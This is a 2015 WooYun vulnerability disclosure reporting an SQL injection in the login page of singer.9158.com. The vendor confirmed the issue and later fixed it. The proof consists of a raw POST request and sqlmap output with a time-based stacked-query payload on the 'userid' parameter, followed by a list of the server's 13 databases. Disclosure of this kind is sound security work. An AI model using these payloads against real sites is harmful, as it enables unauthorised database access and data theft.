当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119835

漏洞标题:9158某站SQL注入

相关厂商:天格科技(杭州)

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-11 17:51

修复时间:2015-07-22 20:42

公开时间:2015-07-22 20:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-11: 厂商已经确认,细节仅向厂商公开
2015-06-21: 细节向核心白帽子及相关领域专家公开
2015-07-01: 细节向普通白帽子公开
2015-07-11: 细节向实习白帽子公开
2015-07-22: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

天地本不仁 万物为刍狗

详细说明:

POST数据包:

POST /login.aspx HTTP/1.1
Host: singer.9158.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://singer.9158.com/
Cookie: ASP.NET_SessionId=3chgwu45soqh11fxloigko45
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
__VIEWSTATE=%2FwEPDwUKLTU5OTI5MDA4MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMSnrtngDOPw6MUqDuuzz8nqygUpv&userid=admin&pwd=admin&yazhengma=hgop&ImageButton1.x=50&ImageButton1.y=11&__EVENTVALIDATION=%2FwEWAwL2hPTXDQLr94HeAgLSwpnTCCyMTjibN10ybcZ4dhPkX08qBWoJ


参数 userid 未过滤 13个库(具体参数见下图以及漏洞证明)

1.png


2.png

漏洞证明:

POST parameter 'userid' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] n
sqlmap identified the following injection points with a total of 1041 HTTP(s) re
quests:
---
Parameter: userid (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUKLTU5OTI5MDA4MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMSnrtngDOPw6MUqDuuzz8nqygUpv&userid=admin';WAIT
FOR DELAY '0:0:20'--&pwd=admin&yazhengma=hgop&ImageButton1.x=50&ImageButton1.y=1
1&__EVENTVALIDATION=/wEWAwL2hPTXDQLr94HeAgLSwpnTCCyMTjibN10ybcZ4dhPkX08qBWoJ
---
[14:30:58] [INFO] testing Microsoft SQL Server
[14:30:58] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[14:31:18] [INFO] confirming Microsoft SQL Server
[14:32:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:32:20] [INFO] fetching database names
[14:32:20] [INFO] fetching number of databases
[14:32:20] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[14:32:20] [INFO] retrieved:
[14:32:21] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:32:21] [ERROR] unable to retrieve the number of databases
[14:32:21] [INFO] retrieved: TianGe
[14:39:22] [INFO] retrieved: master
[14:47:02] [INFO] retrieved: tempdb
[14:55:41] [INFO] retrieved: model
[15:03:27] [INFO] retrieved: msdb
[15:08:41] [INFO] retrieved:
[15:09:44] [ERROR] invalid character detected. retrying..
Repor
[15:19:30] [ERROR] invalid character detected. retrying..
[15:20:32] [ERROR] invalid character detected. retrying..
tServer
[15:30:30] [INFO] retrieved: ReportServerTempDB
[15:55:11] [INFO] retrieved: SEND_MAIL
[16:04:44] [INFO] retrieved: TianGe
[16:11:44] [INFO] retrieved: IP_Stat
[16:21:07] [INFO] retrieved: TianGe_History
[16:40:12] [INFO] retrieved: CarNew
[16:47:12] [INFO] retrieved: CarSport
[16:58:03] [INFO] retrieved: DBA_Monitor
[17:12:36] [INFO] retrieved:
available databases [13]:
[*] CarNew
[*] CarSport
[*] DBA_Monitor
[*] IP_Stat
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SEND_MAIL
[*] tempdb
[*] TianGe
[*] TianGe_History

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-11 23:07

厂商回复:

感谢提交漏洞.

最新状态:

2015-07-22:已修复。

2015-07-22:已确认修复